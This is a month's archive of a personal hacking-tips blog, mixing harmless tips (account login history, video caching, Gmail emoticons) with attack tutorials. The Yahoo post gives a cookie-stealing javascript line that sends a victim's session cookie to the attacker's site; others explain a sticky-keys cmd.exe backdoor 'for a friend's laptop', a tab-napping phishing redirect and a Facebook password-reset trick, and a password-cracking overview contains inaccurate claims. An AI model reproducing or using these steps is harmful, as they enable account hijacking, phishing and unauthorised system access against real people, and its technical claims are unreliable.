Archive for October, 2011


How to identify intruders in GMAIL and YAHOO?

Filed under: InternetLeave a comment
October 29, 2011

Hello Everyone..today i am going to tell you about ..identifying

intruders in your gmail and yahoo account

GMAIL

steps

  1. Go to your bottom right of your gmail account..and see the details options in it.
  2. It would pop up a window telling about session activity..there you can find your ip address and intruder’s ip address too (if there any)
    to find out your ip address...
    type "my ip" (without quotes) in google search 
  3. Snapshot for you * i had provided only two login session but you can see previous 10 login sessions*


What to do?
just click on and change your password

YAHOO

steps

  1. Go to Account Info from your yahoo mail…it’s in the right top menu of your profile name ..just click on it

    It would be asking you to enter your password because might be your account is compromised with session hijacking

  2. Then go to Sign and Security

  3. Check  The Snapshot


Now you can find out if there is any intruder using your own brain 😆

FACEBOOK

Go to Account Settings->Security (on left pane)-> Login Notifications

Check the logins

Comment

Session Hijacking in Yahoo!

Filed under: InternetLeave a comment
October 25, 2011

Hey friends this tutorial is about Session Hijacking in Yahoo! I think Gmail session hijacking not possbile by scripting 😛

Steps

  1. First download the scripts from         http://sharecash.org/download.php?file=2397834                   
  2. Now make an account in any free web hosting site 😆
    I will recommend x10hosting.com
     
  3. Now Upload all the files individually you have downloaded
    3.1. yahoo.php
    3.2. j.js
    3.3. READ ME.txt :mrgreen: (this one for reminder of script to be sent to victim                                                         in case you forget)
    3.4. s.css
    3.5. hacked.php
  4. Now tell the victim to run this javascript on their yahoo account 😯 ..
    (now this is your own headache,,can’t help with it since this tutorial only for educational purpose)

    javascript:document.location=”http://yourwebsite.com/yahoo.php?ex=”.concat(escape(document.cookie));

  5. Now you’ve just grabbed the cookie of the victim successfully yay 🙂
  6. Here comes the important part … i will show you the snapshot too
    now go to http://yourwebsite.com/hacked.php ..the password is hack-a-mania (you can find in script too)

    Check out the snapshot

  7. As you can see our victim’s profile is “hacked profile” ..just click on it and Voila!  You just got accessed to his/her account 🙂
    Thanks for reading my blog 🙄
Comment

How To Change Facebook Password without knowing the current password?

Filed under: Internet3 Comments
October 22, 2011

* No More Working *

Hello Guys..I am going to tell you all about changing facebook password without knowing the current password…this is not a hack or something … i can simply call it a facebook’s own recovery tool 😆 which fails
I will show you some snapshots too ..

Steps

  1. First go to address bar of any opened facebook account and type the following urlhttps://www.facebook.com/roadblock/roadblock_me.php
  2. Now Click Continue
  3. Then Again click Continue

     

  4. Boom…Bingo! you got the option of changing your password without asking for current password 😀 great na 😯

     

  5. Rest is in yours Hands.. keep on clicking continue and finally Log In :mrgreen:Keep Reading My Blogs 😈
Comment

How to download youtube videos( or any video) without using any software

Filed under: ComputerLeave a comment
October 21, 2011

Hello Friends..i know nobody reads my blog 😛 but it is a nice platform to do time pass 😀

today i am gonna teach you all how to download youtube videos in Windows ( most of us know this) and Ubuntu

For Windows:

steps:

  1. Play a youtube video …hehehe yeah you need to play the video first fully
  2. for Chrome Users (most of us use this that’s why)..find out mozilla and other browser by yourself ..dont depend on google always 😛 …find cache of all the browser easy na ❓
  3. now go to C:\Users\Username\AppData\Local\Google\Chrome\UserData\Default\Cache

    most of the pc by default these folders are i.e “AppData” hidden ..so go to folder options and apply to Show Hidden Folders 🙂

  4. now here comes the problem… since the filenames are looking weird…put your brain and as you know videos are generally in MegaBytes(MB) of data ..so try to find the data with more than 2 MB and name them as  filename.flv (your wish what filename you wanna give 😀 )

finally copy and paste the renamed file to your desired folder :mrgreen: 

For Ubuntu:

Most of us use Mozilla Firefox in Ubuntu,,,though i use chromium browser in it too 😛 ..so the following tutorial will be how to download from mozilla cache in ubuntu

steps

  1. first find out your cache folder.. 😆 how? okay go to mozilla address bar type following command
    about:cache?device=disk

    what the hell is this? 😆

    it will provide you Cache Directory
    it is mostly in /home/Username/ .mozilla/firefox/pobaz00i.default/Cache (as per my experience)

  2. Very Important Part these folder  are i.e “.mozilla ” hidden in ubuntu ..so press ctrl+H to find the folder and enjoy the video
  3. Advantage of Ubuntu is that you dont have to search for file alot…the video sign is there and you can easily find out the file you wanna copy and paste to desired folder

    Am I Improving a bit? 😯

Comment

Hack Administrator From Guest Account

Filed under: Internet1 Comment
October 20, 2011

I am very thankful to ExploreHacking.com for such a wonderful tutorial
Lets assume that you have just cracked victim’s windows password.  or simply got access to his windows for some time.Can you make some changes in windows so that you could access the windows again even if victim changes the password ?? or Can you make any changes in your own windows so that you could access it anytime even if anybody sets/changes password ?
Simply Can we set a backdoor in windows ?
Yes we can 🙂 .
Backdoor actually means maintaining access.
okay lets do one thing first. Open your command prompt (run as administrator in win 7/vista).

Type the following command :

Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.

Hopefully your new password must have been set. did you notice one thing ? It didn’t ask you to confirm old password. Now suppose if anyhow we manage to access command prompt at logon screen (without logging in), we can easily change/clear password.  
Okay lets move on.
Now press shift key five times and you must have got a dialog box “sticky keys” on screen.

Sticky keys is a feature that makes it easy for users who have physical  disablilities to press multiple keys at time.   This is the only feature which can be used before logging in at logon screen ( as per my knowledge). I repeat this feature can be used at  logon screen by pressing shift key five times.
Whenevr we start an application like paint, we are actually running mspaint.exe placed inC:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file
sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
But you just cant simply rename it or change system32 files. Follow the tutorial for that.

 Tutorial :


* Go to C:\windows\system32
* Copy cmd.exe on your desktop and rename it to sethc.exe .
*Now copy that file and paste again in system32 directory.

@ Windows XP Users


Hopefully existing orignal sethc.exe must have been replaced and your job is done. Now press shift five times and you would see command prompt on screen.You can access command prompt at windows logon screen and change/clear the password easily using “net user” command.

Note: You can also do these changes while using windows Guest Account. But when you would access command prompt at logon screen, you can change/clear password even of administrator’s account. This is exactly how , we can hack into administrator’s account through guest account.

@ Windows vista/7 Users


You must have got a pop up box saying “Access Denied”.

Actually you can not change system32 directory files until you do not have the permissions. You can not have the permissions until you do not have the ownership. So lets take ownership, change permissions, just follow the steps.

1. Right click on sethc.exe and run as administrator.  Again right click on sethc.exe, open properties.
Click on Advanced tab , then on owner and click edit, change the owner from “trusted installer” to “administrator” and click apply.

 

 

 

2. Then click on ‘Edit’ in security tab to edit permissions. Click on ‘Administrators’ , give it full control
and apply changes.

Okay its done now.

Now try replacing the orignal sethc.exe with our sethc.exe (got by renaming cmd.exe).
Press shift key five times and hopefully you would get command prompt on the screen instead of sticky keys.

Enjoy Command prompt at logon screen…

So do not forget to set this backdoor whenever you would get friend’s  laptop for a few minutes… 🙂

Comment

Latest Gtalk/Gmail Chat Smiley Codes

Filed under: Internet1 Comment
October 18, 2011

We all know the regular Gmail Chat Emoticons, however, there are a few others you can use if you want to impress your friends.

These undocumented Gmail smileys/emoticons only work in the new version of Gmail and can be disabled in the chat section from the settings (Mail Settings->Chat->Emoticons>Emoticons off)

:{:{:{:{

You can make: a diabolic creature }:-), a crab V.v.V, a wince>.<, a broken heart </3, a kiss :-­x and a moustache :{.

Some other smileys still: :­(:) is a pig, :­(|) is a monkey, and :­­* is equivalent to :-­x,

We now have a bell, thanks to a tip from “someone.” Just enter:  +/’\

Also, just noticed that the \m/ shows a radio icon on one of the emoticon themes.

And don’t forget all smileys/emoticons change according to what “theme” you choose on Gmail’s Chat – even these “secret” ones.

Secret ones keep popping up, just received a tip for a robot (android?) one. Just type [:|] and you’ll get this:

… and last but not least: the elusive poop icon in Gmail chat has been discovered! (thanks to a tip from an anonymous reader.)
You can “poop” on you Gmail chats by entering:  ~@~

(hehehe do it for insult … yuck) 😆

Also, in case you didn’t know yet :

  • surrounding a text with * turns it Eg.  *pbcehaxors* = pbcehaxors
  • surrounding a text with _ turns it into Eg.  _pbcehaxors_ = pbcehaxors
  • surrounding a text with – turns it into Eg. -pbcehaxors- = pbcehaxors

(you can combine them to write bold italic, Eg.  _*-pbcehaxors-*_ = pbcehaxors

To send Extra Smileys in Gmail ..enable the Extra Emoji in settings

💡 Mail Settings->Labs->Search For Extra Emoji->Enable

you will find more funny smileys in your gmail

😀 😆 :mrgreen:

Comment

TabNapping-A new kind of Phishing Attack

Filed under: InternetLeave a comment
October 15, 2011

This new way of phishing is known as Tab Napping. The basic steps are same as traditional phishing attack. Phishing is the most popular and widely used method for hacking email accounts. Phishing is not as easy as it’s name. Creating a phishing page is an easy task and any one can download it from various hacking forums for free. The main step of phishing comes after creation of fake login page.

How to send this fake page to the victim??

Here comes the Tab Napping which can make your second step easy than before. No need to send fake page via email to victim.

Tab Napping use the modern browser’s multi tabbed environment. Now a days all people use multiple tabs for accessing Gmail, facebook, orkut and other websites simultaneously. The trick is to confuse user in his/her multiple tabs and redirect any of idle ta of his browser to your phishing silently. Tab Napping works on the user’s assumption that a tabbed web page stays the same when other Internet services are being accessed.

The idea behind this is very simple and is done by javascript. Tab napping is all about the relation of 2 pages. suppose Page A and Page B. Victim was viewing page A in a tab of a browser and then left this idle and and now using some other website in another tab of browser. If the user will not return to page A for some pre-specified time, page A will automatically redirect to Page B. This Page B is your phishing page. This redirection and cheking for user actions is done by Javascript. You can download it for given link.

Make a web page and use the tab napping script in that page say it page A. This script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in script.
check script for this line…

timerRedirect = setInterval(“location.href=’http://www.gmail.com'&#8221;,10000);

this line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script so change is both lines.

so page A with tab napping script will redirect to phishing page B.

Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.

Download Here:

Comment

How To Make Rupee Symbol and use it anywhere on Facebook,Twitter, Google Plus etc

Filed under: Computer2 Comments
October 3, 2011

go to your notepad and type the following html code and save it as rupee.html

<html>

<body>

&#x20B9­; or &#­8377;

20B9 in linux works with CTRL+SHIFT+U+20B9

</body>

</html>

Note: U+20B9 is the unicode for new rupee symbol

then open your file rupee.html and just copy and paste your  output which is  ₹

Comment

Password Hacking

Filed under: Computer, InternetLeave a comment
October 2, 2011

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even ‘well-chosen’ passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :-Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user’s personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word “password”, “passcode”, “admin” and their derivatives
* the user’s name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet’s name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on….

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase &  lowercase characters, numbers and special characters too; is a strong password and can never be guessed.


3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications’ (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on “enter” or “login” login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

 

Comment